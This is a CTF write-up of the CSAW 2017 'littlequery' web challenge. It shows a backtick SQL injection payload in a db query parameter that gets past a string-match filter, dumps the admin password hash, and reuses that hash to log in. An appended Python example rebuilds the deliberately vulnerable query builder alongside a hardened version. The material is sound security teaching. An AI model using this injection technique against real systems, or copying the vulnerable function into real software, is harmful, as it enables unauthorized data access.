CSAW CTF Qualification Round 2017 -- littlequery -- Web200 Writeup

in #csaw, 7 years ago (edited)


Problem description

LittleQuery
I've got a new website for BIG DATA analytics!
http://littlequery.chal.csaw.io


The first page's source contains an HTML comment linking to an API endpoint (anchor text "API"):

/api/db_explore.php


Requesting it with no parameters tells us what it expects:

Must specify mode={schema|preview}

Let's try schema:

http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema

{"dbs":["littlequery"]}


This mode lets us enumerate the database structure, down to the column types of a table:

http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user

{"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}

Trying to read the table contents with preview is blocked:

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user

Database 'littlequery' is not allowed to be previewed.

But the filter is evidently just a string comparison on the db parameter: any other value gets past it and reaches the query, and the error message echoes the backtick-quoted identifiers:

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequeryTEST&table=user

`littlequeryTEST`.`user` doesn't exist.

So the query is presumably built by interpolating both parameters into backtick-quoted identifiers, roughly:

select * from `$db`.`$table`


The check rejects the exact value littlequery, not what ends up in the query, so we close the identifier ourselves inside the db parameter, name the table we want, and comment out the rest of the statement with `-- -` (the %20 is the URL-encoded space MySQL requires after --). The table parameter can be left empty because it is swallowed by the comment:

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`--%20-&table=

[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]

And there is the admin password hash: 40 hex characters (the column is varchar(40)), the length of a SHA-1 digest.

Use it to log in by passing the hash directly in the login POST, which yields the flag:

flag{mayb3_1ts_t1m3_4_real_real_escape_string?}
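The vulnerable build step and a hardened version of it, as an added example that is not part of the original writeup. It reconstructs the server logic inferred above (exact-match filter on the raw db value, both parameters interpolated as backtick-quoted identifiers) against a constructed SQLite stand-in for the challenge database: an attached schema named littlequery holding one admin row with the hash from the writeup. The function names, the IDENT_RE allowlist, the catalog lookups and the handle_request wrapper are this example's own assumptions, not the challenge's code.

```python
import re
import sqlite3

# Hash shown in the writeup above; the rest of the data is constructed for this example.
ADMIN_HASH = "5896e92d38ee883cc09ad6f88df4934f6b074cf8"

# MySQL unquoted identifiers: ASCII letters, digits, underscore, at most 64 characters.
IDENT_RE = re.compile(r"[A-Za-z0-9_]{1,64}")


class PreviewBlocked(Exception):
    """Raised when the preview policy denies a database."""


def setup_db():
    """Stand-in for the challenge DB: an attached SQLite schema named littlequery,
    so `littlequery`.`user` resolves the way MySQL's db.table does."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS littlequery")
    conn.execute("CREATE TABLE littlequery.user (uid INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO littlequery.user VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    conn.commit()
    return conn


def build_preview_sql(db, table):
    """Reconstruction of the server logic inferred from its responses: an exact-match
    check on the raw db parameter, then both parameters interpolated as identifiers."""
    if db == "littlequery":
        raise PreviewBlocked(f"Database '{db}' is not allowed to be previewed.")
    return f"select * from `{db}`.`{table}`"


def preview_vulnerable(conn, db, table):
    return conn.execute(build_preview_sql(db, table)).fetchall()


def quote_ident(name):
    """MySQL-style identifier quoting: a backtick inside the name is doubled.
    mysqli_real_escape_string does not do this; it escapes string-literal
    metacharacters such as the single quote, not backticks."""
    return "`" + name.replace("`", "``") + "`"


def preview_hardened(conn, db, table, denied=("littlequery",)):
    # 1. Shape check before either value goes anywhere near SQL.
    for value in (db, table):
        if not IDENT_RE.fullmatch(value):
            raise ValueError("identifier must match [A-Za-z0-9_]{1,64}")
    # 2. Policy check on the validated name, not on a raw string that may contain quotes.
    if db in denied:
        raise PreviewBlocked(f"Database '{db}' is not allowed to be previewed.")
    # 3. Catalog check: db and table must exist (SQLite's stand-in for information_schema).
    known_dbs = {row[1] for row in conn.execute("PRAGMA database_list")}
    if db not in known_dbs:
        raise LookupError(f"unknown database {db}")
    known_tables = {
        row[0]
        for row in conn.execute(
            f"SELECT name FROM {quote_ident(db)}.sqlite_master WHERE type = 'table'"
        )
    }
    if table not in known_tables:
        raise LookupError(f"unknown table {db}.{table}")
    # 4. Quote anyway, so the query stays safe if the pattern is ever relaxed.
    return conn.execute(f"select * from {quote_ident(db)}.{quote_ident(table)}").fetchall()


def handle_request(handler, conn, db, table):
    """Mimics the endpoint's response kinds: ('rows', data), ('blocked', msg),
    ('rejected', msg) or ('error', msg)."""
    try:
        return ("rows", handler(conn, db, table))
    except PreviewBlocked as e:
        return ("blocked", str(e))
    except (ValueError, LookupError) as e:
        return ("rejected", str(e))
    except sqlite3.OperationalError as e:
        return ("error", str(e))


if __name__ == "__main__":
    conn = setup_db()
    payload = "littlequery`.`user`-- -"      # the db parameter from the writeup, URL-decoded
    print(build_preview_sql(payload, ""))    # the statement the vulnerable server runs
    print(handle_request(preview_vulnerable, conn, payload, ""))
    print(handle_request(preview_hardened, conn, payload, ""))
```

The point of the hardened version is the order of operations: validate the shape of the identifier, apply the deny policy to that validated value, confirm it exists in the catalog, and only then quote it. Escaping alone (what the flag's real_escape_string hint alludes to) is the wrong tool here, since the values are used as identifiers, not string literals, and the filter was comparing a raw string that the query would later interpret differently.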

